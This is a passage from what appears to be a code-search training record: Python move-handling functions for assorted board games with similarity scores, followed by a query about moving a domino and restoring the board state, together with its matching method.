corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def move(state, pos, rel_pos):\n new_state = state.copy()\n return swap(new_state, pos, pos + rel_pos)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def _board_after_move_only(source, dest, board):\n new_board = deepcopy(board)\n x_old, y_old, x_new, y_new = source[0], source[1], dest[0], dest[1]\n new_board[x_new][y_new] = new_board[x_old][y_old]\n new_board[x_old][y_old] = 0\n return new_board", "def make_move(self, board: Block) -> int:\n raise NotImplementedError", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def make_move(self, board):\n user_input = self.get_user_input(\n 'coordinates of next move (x,y): '\n )\n move = self.transform_user_input(user_input)\n\n valid = board.move_is_valid(move)\n while not valid:\n user_input = self.get_user_input(\n 'Invalid move, coordinate of next move: '\n )\n move = self.transform_user_input(user_input)\n valid = board.move_is_valid(move)\n board.set_piece(move, color=self.color)", "def move(self, board):\n\n # We record all game positions to feed them into the NN for training with the corresponding updated Q\n # values.\n self.board_position_log.append(board.getState().copy())\n\n nn_input = self.board_state_to_nn_input(board.getState())\n probs, _ = self.get_valid_probs([nn_input], self.q_net, [board])\n probs = probs[0]\n # print(probs)\n # print(type(probs))\n # print(probs.shape)\n # input()\n # print(probs)\n # Most of the time our next move is the one with the highest probability after removing all illegal ones.\n # Occasionally, however we randomly chose a random move to encourage exploration\n if (self.training is True) and \\\n ((self.game_counter < self.pre_training_games) or (np.random.rand(1) < self.random_move_prob)):\n available = []\n for index in range(6):\n 
if probs[index] != -1.0:\n available.append(index)\n randomOne = random.randint(0,len(available)-1)\n move = available[randomOne]\n else:\n move = np.argmax(probs)\n # We record the action we selected as well as the Q values of the current state for later use when\n # adjusting NN weights.\n self.action_log.append(move)\n\n # We execute the move and return the result\n board.makeMove(move)\n return board.getState(), board.isOver()", "def make_move(self, move):\n if int(move) < 0 or int(move) > 48 or self.board[int(move) // 7][int(move) % 7] != \"\" or int(move) % 2 == 0:\n raise ValueError(\"{} is not a valid move for {}\".format(move, self.board))\n DotsAndBoxesState.score1 += self.check_score(move)\n self.board[int(move) // 7][int(move) % 7] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n self.turn = get_opponent(self.turn) #change into another player's trun", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def domove(board, move):\n for m in getmovesfromoracle(board):\n if m['move'] == move:\n return(m['board'])\n return(None)", "def make_move(self, move, disc):\n column = move - 1\n board = self.game[\"board\"]\n # Check if this row is already full\n if board[column][0] != self.EMPTY:\n return None\n # Drop disc\n for idx, cell in enumerate(board[column]):\n if cell != self.EMPTY:\n row = idx - 1\n break\n else:\n row = idx\n board[column][row] = disc\n return (column, row)", "def make_move(self, move):\n self.board[int(move) - 1] = self.nplayer", "def move(state=None, actual_move=None):\n copy = state.copy()\n copy.push(chess.Move.from_uci(uci=actual_move))\n return copy", "def undo_move(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.sr][move.sc] = move.pieceMoved\r\n self.board[move.er][move.ec] = move.pieceCaptured\r\n self.turn_white = not self.turn_white\r\n\r\n # king pos\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.sr, move.sc)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.sr, move.sc)\r\n\r\n # enpassant\r\n if move.isEnpassantMove:\r\n self.board[move.er][move.ec] = \"--\"\r\n self.board[move.sr][move.ec] = move.pieceCaptured\r\n self.enpas_pos = (move.er, move.ec)\r\n\r\n # pawn x2\r\n if move.pieceMoved[1] == \"p\" and abs(move.sr - move.er) == 2:\r\n 
self.enpas_pos = ()\r\n\r\n # castle rights\r\n self.castleRightsLog.pop()\r\n self.cr_castle_r = self.castleRightsLog[-1]\r\n\r\n # castle moves\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 1]\r\n self.board[move.er][move.ec - 1] = '--'\r\n else:\r\n self.board[move.er][move.ec - 2] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n left_lst_copy.append(temp)\n right_lst_copy = []\n for lst in self.right_lst:\n temp = []\n for item in lst:\n temp.append(item)\n right_lst_copy.append(temp)\n\n hori_result_copy = []\n for item in self.hori_result:\n hori_result_copy.append(item)\n left_result_copy = []\n for item in self.left_result:\n left_result_copy.append(item)\n right_result_copy = []\n for item in self.right_result:\n right_result_copy.append(item)\n\n new_state.hori_lst = hori_lst_copy\n new_state.hori_result = hori_result_copy\n new_state.left_lst = left_lst_copy\n new_state.left_result = left_result_copy\n new_state.right_lst = right_lst_copy\n new_state.right_result = right_result_copy\n # update the new state with str move\n # parallel nested list data structure\n lst = [new_state.hori_lst, new_state.left_lst, new_state.right_lst]\n result = [new_state.hori_result, new_state.left_result, new_state.right_result]\n # update the cell\n for i in range(len(lst)):\n for j in range(len(lst[i])):\n for k in range(len(lst[i][j])):\n if lst[i][j][k] == move:\n # should use the player name of last state, so opposite names\n if new_state.p1_turn:\n lst[i][j][k] = \"2\"\n else:\n lst[i][j][k] = \"1\"\n # update ley-line marks\n # the ley-line may belong to a player after this move\n p1_taken = 0\n p2_taken = 0\n if result[i][j] != \"@\":\n continue\n for item in lst[i][j]:\n if item == \"1\":\n p1_taken += 1\n if item == \"2\":\n p2_taken += 1\n if float(p1_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"1\"\n if float(p2_taken) >= len(lst[i][j]) / 2:\n result[i][j] = \"2\"\n ###### CHECK FOR SHALLOW COPY PROBLEM, IF ATTRIBUTE IS UPDATE IN NEW STATE\n return new_state", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n 
board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def make_move(move, player, board):\n board[move] = player\n for d in DIRECTIONS:\n Othello.make_flips(move, player, board, d)\n return board", "def result(self, board_state, move):\n # Create a copy of the current board state\n output_state = BoardState(other_state=board_state)\n # Swap pieces\n output_state.move_piece(move)\n # Eliminate pieces\n output_state.eliminate_piece()\n return output_state" ]
[ "0.7599279", "0.6890704", "0.6870524", "0.6765509", "0.6765455", "0.67173713", "0.6701276", "0.66965497", "0.66819054", "0.6667514", "0.6663559", "0.66578156", "0.66204715", "0.657253", "0.65490776", "0.6526394", "0.6526335", "0.6520004", "0.6495556", "0.6494918", "0.6452767", "0.6435724", "0.64350605", "0.64282227", "0.64204675", "0.64192647", "0.6402228", "0.6399187", "0.63986206", "0.637706" ]
0.7041228
1
Move a domino and calculate the new board state. Afterward, put the board back in its original state.
def move(self, domino, dx, dy, offset=None): matching_dominoes = set() complement_found = False domino.move(dx, dy) board = domino.head.board try: if not board.is_connected(): raise BadPositionError('Board is not connected after move.') for cell in (domino.head, domino.tail): for neighbour in cell.find_neighbours(): if neighbour.pips == cell.pips: matching_dominoes.add((neighbour.domino, neighbour.domino.head.x, neighbour.domino.head.y)) complement_found = (complement_found or neighbour.pips + cell.pips == 6) if matching_dominoes: matching_dominoes.add((domino, domino.head.x, domino.head.y)) elif not complement_found: raise BadPositionError( 'A legal move must have captures or complements.') for matching_domino, _, _ in matching_dominoes: board.remove(matching_domino) if not board.is_connected(): raise BadPositionError('Board is not connected after capture.') cropping_bounds = [] if offset is not None else None new_state = board.display(cropped=True, cropping_bounds=cropping_bounds) remaining = self.check_progress(board) if offset is not None: offset[0] -= cropping_bounds[0] offset[1] -= cropping_bounds[1] return new_state, remaining finally: for matching_domino, x, y in matching_dominoes: board.add(matching_domino, x, y) domino.move(-dx, -dy)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def move(self, domino, dx, dy) -> typing.Tuple[str, int]:\n domino.move(dx, dy)\n try:\n board = domino.head.board\n if not board.is_connected():\n raise BadPositionError('Board is not connected.')\n if board.has_loner():\n raise BadPositionError('Board has a lonely domino.')\n remaining = self.check_progress(board)\n return board.display(cropped=True), remaining\n finally:\n domino.move(-dx, -dy)", "def move(self, board):\n raise NotImplementedError", "def move(self, board):\n # first, make your turn:\n currentState = board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def domove(self, depart, arrivee, promote):\n\n # Debugging tests\n # if(self.cases[depart].isEmpty()):\n # print('domove() ERROR : asked for an empty square move : ',depart,arrivee,promote)\n # return \n # if(int(depart)<0 or int(depart)>63):\n # print('domove() ERROR : incorrect FROM square number : ',depart)\n # return \n # if(int(arrivee)<0 or int(arrivee)>63):\n # print('domove() ERROR : incorrect TO square number : ',arrivee)\n # return\n # if(not(promote=='' or promote=='q' or promote=='r' or promote=='n' or promote=='b')):\n # print('domove() ERROR : incorrect promote : ',promote)\n # return\n\n # Informations to save in the history moves\n pieceDeplacee = self.cases[depart] # moved piece\n piecePrise = self.cases[arrivee] # taken piece, can be null : Piece()\n isEp = False # will be used to undo a ep move\n histEp = self.ep # saving the actual ep square (-1 or square number TO)\n hist_roque_56 = self.white_can_castle_56\n hist_roque_63 = self.white_can_castle_63\n hist_roque_0 = self.black_can_castle_0\n hist_roque_7 = self.black_can_castle_7\n flagViderEp = True # flag to erase ep or not : if the pawn moved is not taken directly, it can't be taken later\n\n # Moving piece\n self.cases[arrivee] = self.cases[depart]\n self.cases[depart] = Piece()\n\n self.ply += 1\n\n # a PAWN has been moved -------------------------------------\n if (pieceDeplacee.nom == 'PION'):\n\n # White PAWN\n if (pieceDeplacee.couleur == 'blanc'):\n\n # If the move is \"en passant\"\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee + 8] # take black pawn\n self.cases[arrivee + 8] = Piece()\n isEp = True\n\n # The white pawn moves 2 squares from starting square\n # then blacks can take \"en passant\" next move\n elif (self.ROW(depart) == 6 and self.ROW(arrivee) == 4):\n self.ep = arrivee + 8\n flagViderEp = False\n\n # Black PAWN\n else:\n\n if (self.ep == arrivee):\n piecePrise = self.cases[arrivee - 8]\n self.cases[arrivee - 8] = Piece()\n isEp = True\n\n elif (self.ROW(depart) == 1 and self.ROW(arrivee) == 3):\n self.ep = arrivee - 8\n flagViderEp = False\n\n # a ROOK has been moved--------------------------------------\n # update castle rights\n\n elif (pieceDeplacee.nom == 'TOUR'):\n\n # White ROOK\n if (pieceDeplacee.couleur == 'blanc'):\n if (depart == 56):\n self.white_can_castle_56 = False\n elif (depart == 63):\n self.white_can_castle_63 = False\n\n # Black ROOK\n else:\n if (depart == 0):\n self.black_can_castle_0 = False\n elif (depart == 7):\n self.black_can_castle_7 = False\n\n # a KING has been moved-----------------------------------------\n\n elif 
(pieceDeplacee.nom == 'ROI'):\n\n # White KING\n if (pieceDeplacee.couleur == 'blanc'):\n\n # moving from starting square\n if (depart == 60):\n # update castle rights\n self.white_can_castle_56 = False\n self.white_can_castle_63 = False\n\n # If castling, move the rook\n if (arrivee == 58):\n self.cases[56] = Piece()\n self.cases[59] = Piece('TOUR', 'blanc')\n\n elif (arrivee == 62):\n self.cases[63] = Piece()\n self.cases[61] = Piece('TOUR', 'blanc')\n\n # Black KING\n else:\n\n if (depart == 4):\n self.black_can_castle_0 = False\n self.black_can_castle_7 = False\n\n if (arrivee == 6):\n self.cases[7] = Piece()\n self.cases[5] = Piece('TOUR', 'noir')\n\n elif (arrivee == 2):\n self.cases[0] = Piece()\n self.cases[3] = Piece('TOUR', 'noir')\n\n # End pieces cases-----------------------------------------------\n\n # Any move cancels the ep move\n if (flagViderEp == True):\n self.ep = -1\n\n # Promote : the pawn is changed to requested piece\n if (promote != ''):\n if (promote == 'q'):\n self.cases[arrivee] = Piece('DAME', self.side2move)\n elif (promote == 'r'):\n self.cases[arrivee] = Piece('TOUR', self.side2move)\n elif (promote == 'n'):\n self.cases[arrivee] = Piece('CAVALIER', self.side2move)\n elif (promote == 'b'):\n self.cases[arrivee] = Piece('FOU', self.side2move)\n\n # Change side to move\n self.changeTrait()\n\n # Save move to the history list\n self.history.append((depart, \\\n arrivee, \\\n pieceDeplacee, \\\n piecePrise, \\\n isEp, \\\n histEp, \\\n promote, \\\n hist_roque_56, \\\n hist_roque_63, \\\n hist_roque_0, \\\n hist_roque_7))\n\n # If the move lets king in check, undo it and return false\n if (self.in_check(self.oppColor(self.side2move))):\n self.undomove()\n return False\n\n return True", "def make_move(self, move, player, board):\r\n #nBoard = board.copy()\r\n board[move] = player\r\n for d in core.DIRECTIONS:\r\n if self.find_bracket(move, player, board, d)!=None:\r\n self.make_flips(move, player, board, d)\r\n return board", "def moved_board(board):\n return legal_move_on(board=board).map(\n lambda (start, end): board.move(start=start, end=end),\n )", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n 
hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def apply_move(self, move):\r\n next_board = copy.deepcopy(self.board)\r\n next_board.place(self.next_player, move)\r\n return GameState(next_board, self.next_player.other, move)", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def move(state, pos, rel_pos):\n new_state = 
state.copy()\n return swap(new_state, pos, pos + rel_pos)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def _board_after_move_only(source, dest, board):\n new_board = deepcopy(board)\n x_old, y_old, x_new, y_new = source[0], source[1], dest[0], dest[1]\n new_board[x_new][y_new] = new_board[x_old][y_old]\n new_board[x_old][y_old] = 0\n return new_board", "def make_move(self, board: Block) -> int:\n raise NotImplementedError", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def make_move(self, board):\n user_input = self.get_user_input(\n 'coordinates of next move (x,y): '\n )\n move = self.transform_user_input(user_input)\n\n valid = board.move_is_valid(move)\n while not valid:\n user_input = self.get_user_input(\n 'Invalid move, coordinate of next move: '\n )\n move = self.transform_user_input(user_input)\n valid = board.move_is_valid(move)\n board.set_piece(move, color=self.color)", "def move(self, board):\n\n # We record all game positions to feed them into the NN for training with the corresponding updated Q\n # values.\n self.board_position_log.append(board.getState().copy())\n\n nn_input = self.board_state_to_nn_input(board.getState())\n probs, _ = self.get_valid_probs([nn_input], self.q_net, [board])\n probs = probs[0]\n # print(probs)\n # print(type(probs))\n # print(probs.shape)\n # input()\n # print(probs)\n # Most of the time our next move is the one with the highest probability after removing all illegal ones.\n # Occasionally, however we randomly chose a random move to encourage exploration\n if (self.training is True) and \\\n ((self.game_counter < self.pre_training_games) or (np.random.rand(1) < self.random_move_prob)):\n available = []\n for index in range(6):\n if probs[index] != -1.0:\n available.append(index)\n randomOne = random.randint(0,len(available)-1)\n move = available[randomOne]\n else:\n move = np.argmax(probs)\n # We record the action we selected as well as the Q values of the current state for later use when\n # adjusting NN weights.\n self.action_log.append(move)\n\n # We execute the move and return the result\n board.makeMove(move)\n return board.getState(), board.isOver()", "def make_move(self, move):\n if int(move) < 0 or int(move) > 48 or self.board[int(move) // 7][int(move) % 7] != \"\" or int(move) % 2 == 0:\n raise ValueError(\"{} is not a valid move for {}\".format(move, self.board))\n DotsAndBoxesState.score1 += self.check_score(move)\n self.board[int(move) // 7][int(move) % 7] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n self.turn = get_opponent(self.turn) #change into another player's trun", "def make_move(self, move: Any) -> 
\"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n key[1][index] = '2'\n change_dict = {}\n for item in new_ley_lines:\n for key in item:\n p1_count = 0\n p2_count = 0\n for string in key[1]:\n if string == '1':\n p1_count += 1\n if string == '2':\n p2_count += 1\n\n\n if p1_count >= len(key[1])/2 and p1_count > p2_count:\n\n change_dict[key[0]] = '1'\n if p2_count >= len(key[1])/2 and p2_count > p1_count:\n\n change_dict[key[0]] = '2'\n for key in change_dict:\n if not (key == '1' or key == '2'):\n if str(key) in new_board:\n new_board = new_board.replace(str(key), change_dict[key])\n for item in new_ley_lines:\n for key1 in item:\n if key == key1[0]:\n key1[0] = change_dict[key]\n\n new_state = StonehengeState(not self.p1_turn, self.side_length,\n new_board, new_ley_lines)\n return new_state", "def domove(board, move):\n for m in getmovesfromoracle(board):\n if m['move'] == move:\n return(m['board'])\n return(None)", "def make_move(self, move, disc):\n column = move - 1\n board = self.game[\"board\"]\n # Check if this row is already full\n if board[column][0] != self.EMPTY:\n return None\n # Drop disc\n for idx, cell in enumerate(board[column]):\n if cell != self.EMPTY:\n row = idx - 1\n break\n else:\n row = idx\n board[column][row] = disc\n return (column, row)", "def make_move(self, move):\n self.board[int(move) - 1] = self.nplayer", "def move(state=None, actual_move=None):\n copy = state.copy()\n copy.push(chess.Move.from_uci(uci=actual_move))\n return copy", "def undo_move(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.sr][move.sc] = move.pieceMoved\r\n self.board[move.er][move.ec] = move.pieceCaptured\r\n self.turn_white = not self.turn_white\r\n\r\n # king pos\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.sr, move.sc)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.sr, move.sc)\r\n\r\n # enpassant\r\n if move.isEnpassantMove:\r\n self.board[move.er][move.ec] = \"--\"\r\n self.board[move.sr][move.ec] = move.pieceCaptured\r\n self.enpas_pos = (move.er, move.ec)\r\n\r\n # pawn x2\r\n if move.pieceMoved[1] == \"p\" and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ()\r\n\r\n # castle rights\r\n self.castleRightsLog.pop()\r\n self.cr_castle_r = self.castleRightsLog[-1]\r\n\r\n # castle moves\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 1]\r\n self.board[move.er][move.ec - 1] = '--'\r\n else:\r\n self.board[move.er][move.ec - 2] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'", "def make_move(self, move: Any) -> 'StonehengeState':\n if type(move) == str:\n new_state = StonehengeState(not self.p1_turn, self.side_length)\n # copy the board information from current state\n # make copy of current state information\n hori_lst_copy = []\n for lst in self.hori_lst:\n temp = []\n for item in lst:\n temp.append(item)\n hori_lst_copy.append(temp)\n left_lst_copy = []\n for lst in self.left_lst:\n temp = []\n for item in lst:\n temp.append(item)\n 
